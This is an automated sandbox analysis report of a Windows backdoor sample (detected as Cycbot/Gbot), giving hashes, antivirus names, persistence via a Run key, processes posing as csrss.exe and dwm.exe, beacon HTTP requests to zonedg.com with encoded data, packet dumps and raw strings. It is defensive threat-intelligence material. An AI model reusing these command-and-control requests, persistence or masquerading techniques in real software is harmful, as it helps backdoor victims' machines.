Analysis Date2015-01-17 13:32:20
MD53212c998d8936c003b78fc9787672602
SHA124787179bfa871f584758b3cacf75431c1533e6e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7ef643e707d30256f4c303c6ffa28d8e sha1: ae0432e26a649b78b414beb4fedf492463e3256b size: 112128
Section.rdata md5: 34362d03965e9d8c8a6e9bf414dbec7d sha1: b7108d2eb7adc5064a2ad5adc6df86847ec77332 size: 1024
Section.data md5: be2f683f0ee7adb0b70af0f72734ed95 sha1: a20e0b68c3b4712dd2274a59e9240f75be2a33d3 size: 67072
Section.reloc md5: 7c78c3e3fbcde971eae5ec4520a61494 sha1: feeb2113e66a30c51053be7ec2c7ebf060717516 size: 1024
Timestamp2005-09-23 00:10:11
PEhashef6c4758985cc58a9797a07b6eca489e15a3d9d2
IMPhash8f12cf600beca18fe01658893cceab9c
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.IO
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SXV
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSyourmediaresources.com
Winsock DNSyourblogresources.com
Winsock DNSgravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.240
DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNScoolmediastore.com
Type: A
DNSyourblogresources.com
Type: A
DNSyourmediaresources.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v72=84&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqli8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 192.0.80.240:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763732   bcfe64067be2?v72
0x00000040 (00064)   3d383426 74713d67 485a7574 44794d76   =84&tq=gHZutDyMv
0x00000050 (00080)   35724a65 54666961 396e726d 736c3667   5rJeTfia9nrmsl6g
0x00000060 (00096)   69577a25 32424a5a 62567941 25334420   iWz%2BJZbVyA%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a2067 72617661 7461722e 636f6d0d   t: gravatar.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53253246   ij%2B8yjYvEaS%2F
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a2020 3c2f626f 64793e0a   se....  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a                </html>...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53505425   ij%2B82uYvEaSPT%
0x000000c0 (00192)   32427371 4e537225 32466525 32425635   2BsqNSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53765425   ij%2B8CiYvEaSvT%
0x000000c0 (00192)   32427371 6c693852 704c3666 68537225   2Bsqli8RpL6fhSr%
0x000000d0 (00208)   32466525 32425635 5a755267 25334425   2Fe%2BV5ZuRg%3D%
0x000000e0 (00224)   33442048 5454502f 312e310d 0a486f73   3D HTTP/1.1..Hos
0x000000f0 (00240)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x00000100 (00256)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000110 (00272)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000120 (00288)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000130 (00304)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000140 (00320)                                         


Strings
X
.
@
 
..
.
]
L
@
k..
.
.
~..
}.

080904b0
1.0.0.1
1484
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````
~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
<<<<<<<<
>>>>>>>
>>>>>>>>>>>
||||||
|||||||
------
,,,,,,
,,,,,,,,
,,,,,,,,,,
;;;;^^^^^
;;;;;;;;;;
!!::::::::%%%%%
!!!!!``
???????????????-
........
'''''''
'''''''''''''''
""""""
""""""""""""""""
(((((((
((((((((
]]]]]]]))))
{{{{{{{{{{
{{{{{{{{{{{{
{{{#######
@`\-.@
@@$@@)
$ `)$ 
$$$$$$
$$$$$$$
&&&&&&
+++++))))
++++++
							
													
00000444
>00527
#%0n^b
0p}?#=
`#0!pl
@`-0rF
&`@	1}* @
111111
1111111
11111111
,;;1E%
1EWw>6`
&1@fA:&c
[1#g98
,+1gL}
}$\1s{
22222222
&@ 2B6
=2to$@@
@`2wEAx
333333333
3*is ?
4;1(`@Y
4444444
44444444
4444FGGGGGGGGGGG
48x<i{
4d>p"="
4LM/._
~4n;6q
@4P4"(%
]4u+]b
555]]]]]]]]]]]]]]]]]]]]]]]]]]]
555555
55555555555555
5555}}}}999
@@5lC_
|5tx	~
*@@`6\:
6[2<rU
6666666666
6TyYf#V
@@6U6Y
  6uaX
6X]\-o8
|6{Y'h
@`,`@7
777777
7777JJJJJJJYY
7{9kV(
7H-+4FO
7\LHEp
7RaJ]"
7?t2iK@
@ -=7TG|
*@@7W99
=8" @%
888888888
)))))8888888888888888
8:O":-J]
8v~76K7
][9)\?"
9-1.F*
999999
9999999
99#,a-
99lllllllll
\9Dupj
~9G;?_
9N?tsa
9tK+K6
%@#a\"
A3kHTx
 a%/7S
@a%8uB
aaa\\\\\\\\\
$$AAAAA
//AAAAAA
aaaaaaaa
aaaaaaaaaa
AAAAAAAAAA
AAAAAAAAAAAAA
@ }a+b
. @>Abp
af/(@ j
AIv;3U
aRh|H,
a`']t|
aZdcdy
B:>`6s
b(  A[
*@ BB.@ 
bbbbbbb
[[BBBBBBBBBBBBBBB
BDf2V#[
B#ShIx
>bsY1W
bXn4w55
b+x.Tc
 @ {C+
*@ C$@
c[_:6o
c9`x	h
@Ca.  
,  CA[
CBw'kG;w;
ccccccc
CCCCCCC
CCCCCCC7ee	
`C.@`h
_CI3nIZ
ClipCursor
CLT6;)
cM'ijh `
#CO]nL
CreatePopupMenu
.``%Cv`
@da/=m
@.data
dddddd
//DDDDDDDD
ddddddddd
DDDDDDDDD
++++DDDDDDDDD
dddddddddddddrrrrrrrrrrr
DestroyMenu
DeUKYO
+DF-ey%
dGjLp=~
!dH	oEL
dM2hKL
Dno~{,
doP{Cy.
DuplicateHandle
dXN|o	N
EEEEEE
Eg37*1Y
e~!K/dU9ABc
`eL\ @@
@(@`eL
%^Em19
EnumResourceNamesW
	eoavW
E___________________r
E!Sl>|
@ eu^Oq(`
){E$vo0m
,``]^F
)~^F^$` 
F`0~@;
F=1q,.&0
}F_9+5T
ff>>>>
fffffff
ffffggggggg\\\ff
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
\F]>Iw
FlushInstructionCache
F'X95f
G&@@, @
GetDesktopWindow
GetModuleFileNameW
GGGG@@@@@@@
gggggg
ggggggg
GGGiii
~gIml0]
GjNsZf!
g$j-	wD&l
@`G}o*
]h.dll
'HEgMq
,@@h<f
hhh"""""""EEEEEEEEEEE										
HHHHHHH
Hhhhuuuuphhhhdddddddddd
#hhIIIIII
.@`hn.`
h\O|U|( 
<'-i17q
ICCCCCCCCC
IIII88
IIIIIIII
iiiiiiiiiAAAAAE
@I:[qP
I&+rd"
J]]]]]***
(j0C8Jw
j2AuEJ/
=}j9jK
)JdLxB
Jg|X:J
JH\y_r
JJJJJJJJJJhhh
JJJmmmmmmm
Jk%b|M
JtAs~x
~jW]Qc
jyGzx,
	&@@k	=
}|]_>K
	K>0DC
k3QQG`
k"`@?b
KERNEL32.dll
KjqF@p
KKKK}}}}
kkkkkkkkk
KKKKKKKKKKK
K@nkf(Jx
kZB;`M
\-L>=3/
l4oNUf@
lCXRfu
L;^">D
l{h[`r
lhRX_PgF
L[HV,xW/D\
llllllllll
]ln)/Y
  `l=zS
`   `m]
`\:m^;>
MapViewOfFile
M}BAvu
mE:X0g
M@fX5G
MMMMMMM
mmmmmmmmm
mmmmmmmmmmmmm
MMMMPPKKK
mpef0k
mRSj'-L( 
MUP:T9
MY&XyI
@ n ``
N$  2C
n?@2IL
n3mPR,@ 
]N-5.@ 
NdrComplexArrayFree
nhF8@4
Nilat6
nI	W9/Hn
n!:[kV
nnFFFFF
nnnnn{{{{{{888
NNNNNNNNNN.
`@no;W
NsGRv:
NxsuwR
o:::::
O3,@@%`
OB+eb=
o;/F0v
Ofr&b	
Ofy(@`
oj?&  =
oLJC9@
@o!M],
onoV   
OnSR!)=
ooooooo
OOOOOOOO
: @@Oqh
)OTb{H
@`%ou#
O,` V@
O<v5		
P&`@H	
!PpK|C
pppppp
PPPPPPPP
PPPPPPPPP
PPPPPPPPPPPP
pppppppppt
pSTW}'`k
Pt9Hi3m
PuLW<V
*pVD7S
pWxB/Ij|"
 @Pxw:
-`Q]${
%;QG_/}P
qjz2'_2
QQiiiiiiiiiiiiiiiiii_
qqqqkkkk
QQQQQQQQQFFF
QUEQAB'
qwy_&u
Qz~-^`&Gt9
` \@R)
_?R_0c
`.rdata
RedrawWindow
.reloc
|R`hzd~d
+Rlcdl
r'mX&kN
R/$` P
RPCRT4.dll
^^^^^RR
===========RRRR
RRRRRRR
rrrrrrrCCCCCC22222
RRRRRRRRRRRRRRRR
rvmR:6N
*rVsVW
%s\<`,
S!\2bc
S\9k.l
saF9eo:Af
S|B]|{
SetFileShortNameW
;^s]eu
s(>=Gk
SHELL32.dll
Shell_NotifyIconA
s))Hloj
)))))ssss
ssss++++
SSSSSS
sssssss
sssssssssssss
]Svvvvvvvvvvv
S_Z1LB
SzD16>
sZj)b)
!*  t?
T-Cb5O
 Td?FD
!This program cannot be run in DOS mode.
timeEndPeriod
+TJ=A"@
`tk_<0/\
T%ko(P
Tm&oCbH
)Tp-4Y
t'+=r8
TrackPopupMenuEx
TTTTTTTTTT,,
TTTTTTTTTTTT,,
tUd_v_
!TwQ8*z
@~"']U
_u9{L>H
UnmapViewOfFile
USER32
UuidCreate
UUUUUUU
~'v*_2 
V. `FuGn
vGqLzV* 
@@vJBP
@`V, `)q|6
VsHm#=
VVVV//////
@@vW1le
VwEDzB
#w^"@`
 ~;wf9
W^/Fz$	-
+wGi`5
WINMM.dll
 wn1@L
Wq>}vP
www++++++++fff
wwwwwwwww>
+[*Wyi|
	?X$  
x1a?,@
 x+|_e|
XH"p'!3
+$XJ%5z
@ xnnh
 @?Xu;(
X!U?3w
}XWI0fe
XXeeejjjjj3
xxxxxx
XXXXXX
  ]Y`=
y4IdHJ
Y7Q1QX
      yFFMMMMM
y@-KJ*
y	{o.)
YQ.@ h
  @YRXp
YtHQ<a
'''''''yyy
yyyyiiiii
yyyyyy
YYYyyy
yyyyyyy
YYYYYYYYYYY
z&% 1E
@`\+zf
zo#"07
Z$` Ox
z-U20@5
  zvEnV
zXqr6|E
)zz>+r
\=z	?ZYC
ZZZZZZZ
zzzzzzz77
							ZZZZZZZZZJ
zzzzzzzzzzz
zzzzzzzzzzzzzzzzz